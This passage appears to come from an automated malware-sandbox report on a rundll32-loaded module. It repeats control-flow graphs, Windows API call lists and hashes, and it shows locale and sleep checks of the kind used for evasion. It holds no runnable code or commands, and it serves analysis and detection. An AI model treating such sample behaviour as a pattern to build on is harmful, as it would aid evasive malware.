                  • GetWindowTextLengthA.USER32(?), ref: 7EDB9D93
                  • GetSystemDefaultLangID.KERNEL32(?,?,?), ref: 7EDBA916
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CodeDefaultLangLengthPageSystemTextValidWindowlstrlen
                  • String ID: :FailedAddIndicator$DD?ljh$c$interrupted${
                  • API String ID: 1777851835-3635123605
                  • Opcode ID: 6767d1bebad7fc6cf4ce52c236efab145e675b12bd2cc645e8f5d9d929380413
                  • Instruction ID: 27819ca1dfd41925c6dc342831a65be2f27d523a19ce57f2454b3cece6d8e9fd
                  • Opcode Fuzzy Hash: 6767d1bebad7fc6cf4ce52c236efab145e675b12bd2cc645e8f5d9d929380413
                  • Instruction Fuzzy Hash: 5C339D75D04268CBCB14DBA8CD45BEDBBB5AB49300F1085D9D44AB7246EB385F84CFA2

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1103 7edb9f44-7edba58b call 7ee02f90 call 7ede23a0 call 7ee02f90 * 2 call 7ee02fd0 1125 7edbdcd8 IsValidCodePage lstrlenA GetWindowTextLengthA 1103->1125 1126 7edba591-7edba5bd 1103->1126 1138 7edb9e37-7edb9ead 1125->1138 1129 7edba5bf-7edba5c8 1126->1129 1130 7edba5ce-7edbab5a GetSystemDefaultLangID call 7ee02f90 call 7ee03110 1126->1130 1129->1130 1158 7edbd922-7edbdcd2 call 7eda6730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda9cc0 GetPEB call 7ed9d080 Sleep 1130->1158 1159 7edbab60-7edbad65 1130->1159 1158->1125 1170 7edbad67-7edbad73 1159->1170 1171 7edbad75-7edbad92 1159->1171 1170->1171 1175 7edbad9d-7edbaed8 call 7ee02f90 call 7ed945a0 call 7ed944b0 1171->1175 1176 7edbad94-7edbad9b 1171->1176 1175->1158 1197 7edbaede-7edbb010 call 7ee02f90 call 7ed945a0 call 7ed94290 1175->1197 1176->1175 1222 7edbb349-7edbb36c call 7ed945a0 call 7ed94290 1197->1222 1223 7edbb016-7edbb1e1 call 7ed945a0 call 7ed9d1c0 call 7edcf690 call 7ed945a0 call 7ed9d1c0 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7edc6d20 call 7edcc510 1197->1223 1232 7edbb372-7edbb541 call 7ed945a0 call 7ed9d1c0 call 7edd0ff0 call 7ed945a0 call 7ed9d1c0 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7edc6d20 call 7edcc510 1222->1232 1233 7edbb696-7edbb6b9 call 7ed945a0 call 7ed94290 1222->1233 1223->1222 1232->1233 1248 7edbb6bf-7edbb83e call 7ed945a0 call 7ed94730 call 7edd2950 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 1233->1248 1249 7edbb977-7edbb99a call 7ed945a0 call 7ed94290 1233->1249 1248->1249 1267 7edbbc58-7edbbc7b call 7ed945a0 call 7ed94290 1249->1267 1268 7edbb9a0-7edbbb1f call 7ed945a0 call 7ed94730 call 7edd4bd0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 1249->1268 1292 7edbbf39-7edbbf5c call 7ed945a0 call 7ed94290 1267->1292 1293 7edbbc81-7edbbe00 call 7ed945a0 call 7ed94730 call 7edd6d40 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 1267->1293 1268->1267 1322 7edbc21a-7edbc23d call 7ed945a0 call 7ed94290 1292->1322 1323 7edbbf62-7edbc0e1 call 7ed945a0 call 7ed94730 call 7edf5760 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 1292->1323 1293->1292 1362 7edbc4fb-7edbc51e call 7ed945a0 call 7ed94290 1322->1362 1363 7edbc243-7edbc3c2 call 7ed945a0 call 7ed94730 call 7edf6240 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 1322->1363 1323->1322 1400 7edbc7dc-7edbc7ff call 7ed945a0 call 7ed94290 1362->1400 1401 7edbc524-7edbc6a3 call 7ed945a0 call 7ed94730 call 7edbe090 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 1362->1401 1363->1362 1431 7edbcabd-7edbcae0 call 7ed945a0 call 7ed94290 1400->1431 1432 7edbc805-7edbc984 call 7ed945a0 call 7ed94730 call 7edbdd40 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 1400->1432 1401->1400 1466 7edbcd9e-7edbcdc1 call 7ed945a0 call 7ed94290 1431->1466 1467 7edbcae6-7edbcc65 call 7ed945a0 call 7ed94730 call 7edbec20 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 1431->1467 1432->1431 1503 7edbd07f-7edbd0a2 call 7ed945a0 call 7ed94290 1466->1503 1504 7edbcdc7-7edbcf46 call 7ed945a0 call 7ed94730 call 7edb6760 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 1466->1504 1467->1466 1539 7edbd0a8-7edbd227 call 7ed945a0 call 7ed94730 call 7edb65b0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 1503->1539 1540 7edbd360-7edbd383 call 7ed945a0 call 7ed94290 1503->1540 1504->1503 1539->1540 1576 7edbd389-7edbd508 call 7ed945a0 call 7ed94730 call 7edbe3e0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 1540->1576 1577 7edbd641-7edbd664 call 7ed945a0 call 7ed94290 1540->1577 1576->1577 1577->1158 1606 7edbd66a-7edbd7e9 call 7ed945a0 call 7ed94730 call 7edbeaa0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 1577->1606 1606->1158
                  APIs
                  • IsValidCodePage.KERNEL32(17BCCBAC), ref: 7EDB9C77
                  • lstrlenA.KERNEL32(?), ref: 7EDB9CB8
                  • GetWindowTextLengthA.USER32(?), ref: 7EDB9D93
                  • GetSystemDefaultLangID.KERNEL32(?,?,?), ref: 7EDBA916
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CodeDefaultLangLengthPageSystemTextValidWindowlstrlen
                  • String ID: :FailedAddIndicator$DD?ljh$c$interrupted${
                  • API String ID: 1777851835-3635123605
                  • Opcode ID: f97334136f3222244d93125ce971dc2c9096c83b7dc72c4adaaaf7a32e15c68c
                  • Instruction ID: f6b73991678ce5147b1aa6de473de317ed87aa093c1b36a2c405b5c718d2f261
                  • Opcode Fuzzy Hash: f97334136f3222244d93125ce971dc2c9096c83b7dc72c4adaaaf7a32e15c68c
                  • Instruction Fuzzy Hash: CE239E75D04258CBCB14DBA8CD45BEEBBB5AB49300F1085D9D44AB7246EB385F84CFA2

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1711 7edba2e1-7edba30b 1712 7edba3c3-7edba58b call 7ee02f90 call 7ee02fd0 1711->1712 1713 7edba311-7edba31d 1711->1713 1724 7edbdcd8 IsValidCodePage lstrlenA GetWindowTextLengthA 1712->1724 1725 7edba591-7edba5bd 1712->1725 1713->1712 1715 7edba323-7edba3bd call 7ee02f90 1713->1715 1715->1712 1737 7edb9e37-7edb9ead 1724->1737 1728 7edba5bf-7edba5c8 1725->1728 1729 7edba5ce-7edbab5a GetSystemDefaultLangID call 7ee02f90 call 7ee03110 1725->1729 1728->1729 1757 7edbd922-7edbdcd2 call 7eda6730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda9cc0 GetPEB call 7ed9d080 Sleep 1729->1757 1758 7edbab60-7edbad65 1729->1758 1757->1724 1769 7edbad67-7edbad73 1758->1769 1770 7edbad75-7edbad92 1758->1770 1769->1770 1774 7edbad9d-7edbaed8 call 7ee02f90 call 7ed945a0 call 7ed944b0 1770->1774 1775 7edbad94-7edbad9b 1770->1775 1774->1757 1796 7edbaede-7edbb010 call 7ee02f90 call 7ed945a0 call 7ed94290 1774->1796 1775->1774 1821 7edbb349-7edbb36c call 7ed945a0 call 7ed94290 1796->1821 1822 7edbb016-7edbb1e1 call 7ed945a0 call 7ed9d1c0 call 7edcf690 call 7ed945a0 call 7ed9d1c0 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7edc6d20 call 7edcc510 1796->1822 1831 7edbb372-7edbb541 call 7ed945a0 call 7ed9d1c0 call 7edd0ff0 call 7ed945a0 call 7ed9d1c0 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7edc6d20 call 7edcc510 1821->1831 1832 7edbb696-7edbb6b9 call 7ed945a0 call 7ed94290 1821->1832 1822->1821 1831->1832 1847 7edbb6bf-7edbb83e call 7ed945a0 call 7ed94730 call 7edd2950 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 1832->1847 1848 7edbb977-7edbb99a call 7ed945a0 call 7ed94290 1832->1848 1847->1848 1866 7edbbc58-7edbbc7b call 7ed945a0 call 7ed94290 1848->1866 1867 7edbb9a0-7edbbb1f call 7ed945a0 call 7ed94730 call 7edd4bd0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 1848->1867 1891 7edbbf39-7edbbf5c call 7ed945a0 call 7ed94290 1866->1891 1892 7edbbc81-7edbbe00 call 7ed945a0 call 7ed94730 call 7edd6d40 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 1866->1892 1867->1866 1921 7edbc21a-7edbc23d call 7ed945a0 call 7ed94290 1891->1921 1922 7edbbf62-7edbc0e1 call 7ed945a0 call 7ed94730 call 7edf5760 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 1891->1922 1892->1891 1961 7edbc4fb-7edbc51e call 7ed945a0 call 7ed94290 1921->1961 1962 7edbc243-7edbc3c2 call 7ed945a0 call 7ed94730 call 7edf6240 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 1921->1962 1922->1921 1999 7edbc7dc-7edbc7ff call 7ed945a0 call 7ed94290 1961->1999 2000 7edbc524-7edbc6a3 call 7ed945a0 call 7ed94730 call 7edbe090 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 1961->2000 1962->1961 2030 7edbcabd-7edbcae0 call 7ed945a0 call 7ed94290 1999->2030 2031 7edbc805-7edbc984 call 7ed945a0 call 7ed94730 call 7edbdd40 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 1999->2031 2000->1999 2065 7edbcd9e-7edbcdc1 call 7ed945a0 call 7ed94290 2030->2065 2066 7edbcae6-7edbcc65 call 7ed945a0 call 7ed94730 call 7edbec20 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 2030->2066 2031->2030 2102 7edbd07f-7edbd0a2 call 7ed945a0 call 7ed94290 2065->2102 2103 7edbcdc7-7edbcf46 call 7ed945a0 call 7ed94730 call 7edb6760 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 2065->2103 2066->2065 2138 7edbd0a8-7edbd227 call 7ed945a0 call 7ed94730 call 7edb65b0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 2102->2138 2139 7edbd360-7edbd383 call 7ed945a0 call 7ed94290 2102->2139 2103->2102 2138->2139 2175 7edbd389-7edbd508 call 7ed945a0 call 7ed94730 call 7edbe3e0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 2139->2175 2176 7edbd641-7edbd664 call 7ed945a0 call 7ed94290 2139->2176 2175->2176 2176->1757 2205 7edbd66a-7edbd7e9 call 7ed945a0 call 7ed94730 call 7edbeaa0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 2176->2205 2205->1757
                  APIs
                  • IsValidCodePage.KERNEL32(17BCCBAC), ref: 7EDB9C77
                  • lstrlenA.KERNEL32(?), ref: 7EDB9CB8
                  • GetWindowTextLengthA.USER32(?), ref: 7EDB9D93
                  • GetSystemDefaultLangID.KERNEL32(?,?,?), ref: 7EDBA916
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CodeDefaultLangLengthPageSystemTextValidWindowlstrlen
                  • String ID: :FailedAddIndicator$DD?ljh$c$interrupted${
                  • API String ID: 1777851835-3635123605
                  • Opcode ID: 36d8f706fe4e56ac278e53bc71b099aaaec2b59886a036e0590050f5d251095e
                  • Instruction ID: 68fad0227e1798006d27532b70ef90ba3739d6d1e41373017bdaee19ed456642
                  • Opcode Fuzzy Hash: 36d8f706fe4e56ac278e53bc71b099aaaec2b59886a036e0590050f5d251095e
                  • Instruction Fuzzy Hash: B8239D75D04258CBCB14DBA8CD45BEEBBB5AB49200F1085DDD44AB7246EB385F84CFA2

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 2310 7edba415-7edba58b call 7ee02f90 * 2 call 7ee02fd0 2321 7edbdcd8 IsValidCodePage lstrlenA GetWindowTextLengthA 2310->2321 2322 7edba591-7edba5bd 2310->2322 2334 7edb9e37-7edb9ead 2321->2334 2325 7edba5bf-7edba5c8 2322->2325 2326 7edba5ce-7edbab5a GetSystemDefaultLangID call 7ee02f90 call 7ee03110 2322->2326 2325->2326 2354 7edbd922-7edbdcd2 call 7eda6730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda9cc0 GetPEB call 7ed9d080 Sleep 2326->2354 2355 7edbab60-7edbad65 2326->2355 2354->2321 2366 7edbad67-7edbad73 2355->2366 2367 7edbad75-7edbad92 2355->2367 2366->2367 2371 7edbad9d-7edbaed8 call 7ee02f90 call 7ed945a0 call 7ed944b0 2367->2371 2372 7edbad94-7edbad9b 2367->2372 2371->2354 2393 7edbaede-7edbb010 call 7ee02f90 call 7ed945a0 call 7ed94290 2371->2393 2372->2371 2418 7edbb349-7edbb36c call 7ed945a0 call 7ed94290 2393->2418 2419 7edbb016-7edbb1e1 call 7ed945a0 call 7ed9d1c0 call 7edcf690 call 7ed945a0 call 7ed9d1c0 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7edc6d20 call 7edcc510 2393->2419 2428 7edbb372-7edbb541 call 7ed945a0 call 7ed9d1c0 call 7edd0ff0 call 7ed945a0 call 7ed9d1c0 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7edc6d20 call 7edcc510 2418->2428 2429 7edbb696-7edbb6b9 call 7ed945a0 call 7ed94290 2418->2429 2419->2418 2428->2429 2444 7edbb6bf-7edbb83e call 7ed945a0 call 7ed94730 call 7edd2950 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 2429->2444 2445 7edbb977-7edbb99a call 7ed945a0 call 7ed94290 2429->2445 2444->2445 2463 7edbbc58-7edbbc7b call 7ed945a0 call 7ed94290 2445->2463 2464 7edbb9a0-7edbbb1f call 7ed945a0 call 7ed94730 call 7edd4bd0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 2445->2464 2488 7edbbf39-7edbbf5c call 7ed945a0 call 7ed94290 2463->2488 2489 7edbbc81-7edbbe00 call 7ed945a0 call 7ed94730 call 7edd6d40 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 2463->2489 2464->2463 2518 7edbc21a-7edbc23d call 7ed945a0 call 7ed94290 2488->2518 2519 7edbbf62-7edbc0e1 call 7ed945a0 call 7ed94730 call 7edf5760 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 2488->2519 2489->2488 2558 7edbc4fb-7edbc51e call 7ed945a0 call 7ed94290 2518->2558 2559 7edbc243-7edbc3c2 call 7ed945a0 call 7ed94730 call 7edf6240 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 2518->2559 2519->2518 2596 7edbc7dc-7edbc7ff call 7ed945a0 call 7ed94290 2558->2596 2597 7edbc524-7edbc6a3 call 7ed945a0 call 7ed94730 call 7edbe090 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 2558->2597 2559->2558 2627 7edbcabd-7edbcae0 call 7ed945a0 call 7ed94290 2596->2627 2628 7edbc805-7edbc984 call 7ed945a0 call 7ed94730 call 7edbdd40 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 2596->2628 2597->2596 2662 7edbcd9e-7edbcdc1 call 7ed945a0 call 7ed94290 2627->2662 2663 7edbcae6-7edbcc65 call 7ed945a0 call 7ed94730 call 7edbec20 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 2627->2663 2628->2627 2699 7edbd07f-7edbd0a2 call 7ed945a0 call 7ed94290 2662->2699 2700 7edbcdc7-7edbcf46 call 7ed945a0 call 7ed94730 call 7edb6760 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 2662->2700 2663->2662 2735 7edbd0a8-7edbd227 call 7ed945a0 call 7ed94730 call 7edb65b0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 2699->2735 2736 7edbd360-7edbd383 call 7ed945a0 call 7ed94290 2699->2736 2700->2699 2735->2736 2772 7edbd389-7edbd508 call 7ed945a0 call 7ed94730 call 7edbe3e0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 2736->2772 2773 7edbd641-7edbd664 call 7ed945a0 call 7ed94290 2736->2773 2772->2773 2773->2354 2802 7edbd66a-7edbd7e9 call 7ed945a0 call 7ed94730 call 7edbeaa0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 2773->2802 2802->2354
                  APIs
                  • IsValidCodePage.KERNEL32(17BCCBAC), ref: 7EDB9C77
                  • lstrlenA.KERNEL32(?), ref: 7EDB9CB8
                  • GetWindowTextLengthA.USER32(?), ref: 7EDB9D93
                  • GetSystemDefaultLangID.KERNEL32(?,?,?), ref: 7EDBA916
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CodeDefaultLangLengthPageSystemTextValidWindowlstrlen
                  • String ID: :FailedAddIndicator$DD?ljh$c$interrupted${
                  • API String ID: 1777851835-3635123605
                  • Opcode ID: fd7042134e41de1da764f295125a27866514615d1de5a3f35dc368a1f4978ebc
                  • Instruction ID: 4caa6abfb994a02e54a6f0fb8a2826f0360967770058e028ce67254a8b23cfb1
                  • Opcode Fuzzy Hash: fd7042134e41de1da764f295125a27866514615d1de5a3f35dc368a1f4978ebc
                  • Instruction Fuzzy Hash: 61239D75D04258CBCB14DBA8CD45BEEBBB5AB49200F1085DDD44AB7246EB385F84CFA2

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 2907 7edba72c-7edbab5a call 7ee02f90 GetSystemDefaultLangID call 7ee02f90 call 7ee03110 2933 7edbd922-7edbdcd8 IsValidCodePage lstrlenA GetWindowTextLengthA call 7eda6730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda9cc0 GetPEB call 7ed9d080 Sleep 2907->2933 2934 7edbab60-7edbad65 2907->2934 3016 7edb9e37-7edb9ead 2933->3016 2945 7edbad67-7edbad73 2934->2945 2946 7edbad75-7edbad92 2934->2946 2945->2946 2950 7edbad9d-7edbaed8 call 7ee02f90 call 7ed945a0 call 7ed944b0 2946->2950 2951 7edbad94-7edbad9b 2946->2951 2950->2933 2972 7edbaede-7edbb010 call 7ee02f90 call 7ed945a0 call 7ed94290 2950->2972 2951->2950 2997 7edbb349-7edbb36c call 7ed945a0 call 7ed94290 2972->2997 2998 7edbb016-7edbb1e1 call 7ed945a0 call 7ed9d1c0 call 7edcf690 call 7ed945a0 call 7ed9d1c0 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7edc6d20 call 7edcc510 2972->2998 3012 7edbb372-7edbb541 call 7ed945a0 call 7ed9d1c0 call 7edd0ff0 call 7ed945a0 call 7ed9d1c0 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7edc6d20 call 7edcc510 2997->3012 3013 7edbb696-7edbb6b9 call 7ed945a0 call 7ed94290 2997->3013 2998->2997 3012->3013 3031 7edbb6bf-7edbb83e call 7ed945a0 call 7ed94730 call 7edd2950 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 3013->3031 3032 7edbb977-7edbb99a call 7ed945a0 call 7ed94290 3013->3032 3031->3032 3050 7edbbc58-7edbbc7b call 7ed945a0 call 7ed94290 3032->3050 3051 7edbb9a0-7edbbb1f call 7ed945a0 call 7ed94730 call 7edd4bd0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 3032->3051 3075 7edbbf39-7edbbf5c call 7ed945a0 call 7ed94290 3050->3075 3076 7edbbc81-7edbbe00 call 7ed945a0 call 7ed94730 call 7edd6d40 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 3050->3076 3051->3050 3105 7edbc21a-7edbc23d call 7ed945a0 call 7ed94290 3075->3105 3106 7edbbf62-7edbc0e1 call 7ed945a0 call 7ed94730 call 7edf5760 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 3075->3106 3076->3075 3145 7edbc4fb-7edbc51e call 7ed945a0 call 7ed94290 3105->3145 3146 7edbc243-7edbc3c2 call 7ed945a0 call 7ed94730 call 7edf6240 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 3105->3146 3106->3105 3183 7edbc7dc-7edbc7ff call 7ed945a0 call 7ed94290 3145->3183 3184 7edbc524-7edbc6a3 call 7ed945a0 call 7ed94730 call 7edbe090 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 3145->3184 3146->3145 3214 7edbcabd-7edbcae0 call 7ed945a0 call 7ed94290 3183->3214 3215 7edbc805-7edbc984 call 7ed945a0 call 7ed94730 call 7edbdd40 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 3183->3215 3184->3183 3249 7edbcd9e-7edbcdc1 call 7ed945a0 call 7ed94290 3214->3249 3250 7edbcae6-7edbcc65 call 7ed945a0 call 7ed94730 call 7edbec20 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 3214->3250 3215->3214 3286 7edbd07f-7edbd0a2 call 7ed945a0 call 7ed94290 3249->3286 3287 7edbcdc7-7edbcf46 call 7ed945a0 call 7ed94730 call 7edb6760 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 3249->3287 3250->3249 3322 7edbd0a8-7edbd227 call 7ed945a0 call 7ed94730 call 7edb65b0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 3286->3322 3323 7edbd360-7edbd383 call 7ed945a0 call 7ed94290 3286->3323 3287->3286 3322->3323 3359 7edbd389-7edbd508 call 7ed945a0 call 7ed94730 call 7edbe3e0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 3323->3359 3360 7edbd641-7edbd664 call 7ed945a0 call 7ed94290 3323->3360 3359->3360 3360->2933 3389 7edbd66a-7edbd7e9 call 7ed945a0 call 7ed94730 call 7edbeaa0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 3360->3389 3389->2933
                  APIs
                  • GetSystemDefaultLangID.KERNEL32(?,?,?), ref: 7EDBA916
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: DefaultLangSystem
                  • String ID: :FailedAddIndicator$DD?ljh$c$interrupted${
                  • API String ID: 706401283-3635123605
                  • Opcode ID: 8b148d579c02237149747035618a2b40484be14756b253d576d46766e3cda964
                  • Instruction ID: d6d7ba3bd0622a930a79f4a6b19d29364c2bccf89213fcf5b3fee2c0b729fd49
                  • Opcode Fuzzy Hash: 8b148d579c02237149747035618a2b40484be14756b253d576d46766e3cda964
                  • Instruction Fuzzy Hash: 71139E75D04258CBCB14EBA8CD45BDEBBB5AB49200F1085DDD44AB7246EB385F84CFA2

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 3494 7edba6a2-7edbab5a GetSystemDefaultLangID call 7ee02f90 call 7ee03110 3514 7edbd922-7edbdcd8 IsValidCodePage lstrlenA GetWindowTextLengthA call 7eda6730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda9cc0 GetPEB call 7ed9d080 Sleep 3494->3514 3515 7edbab60-7edbad65 3494->3515 3597 7edb9e37-7edb9ead 3514->3597 3526 7edbad67-7edbad73 3515->3526 3527 7edbad75-7edbad92 3515->3527 3526->3527 3531 7edbad9d-7edbaed8 call 7ee02f90 call 7ed945a0 call 7ed944b0 3527->3531 3532 7edbad94-7edbad9b 3527->3532 3531->3514 3553 7edbaede-7edbb010 call 7ee02f90 call 7ed945a0 call 7ed94290 3531->3553 3532->3531 3578 7edbb349-7edbb36c call 7ed945a0 call 7ed94290 3553->3578 3579 7edbb016-7edbb1e1 call 7ed945a0 call 7ed9d1c0 call 7edcf690 call 7ed945a0 call 7ed9d1c0 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7edc6d20 call 7edcc510 3553->3579 3593 7edbb372-7edbb541 call 7ed945a0 call 7ed9d1c0 call 7edd0ff0 call 7ed945a0 call 7ed9d1c0 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7edc6d20 call 7edcc510 3578->3593 3594 7edbb696-7edbb6b9 call 7ed945a0 call 7ed94290 3578->3594 3579->3578 3593->3594 3612 7edbb6bf-7edbb83e call 7ed945a0 call 7ed94730 call 7edd2950 call 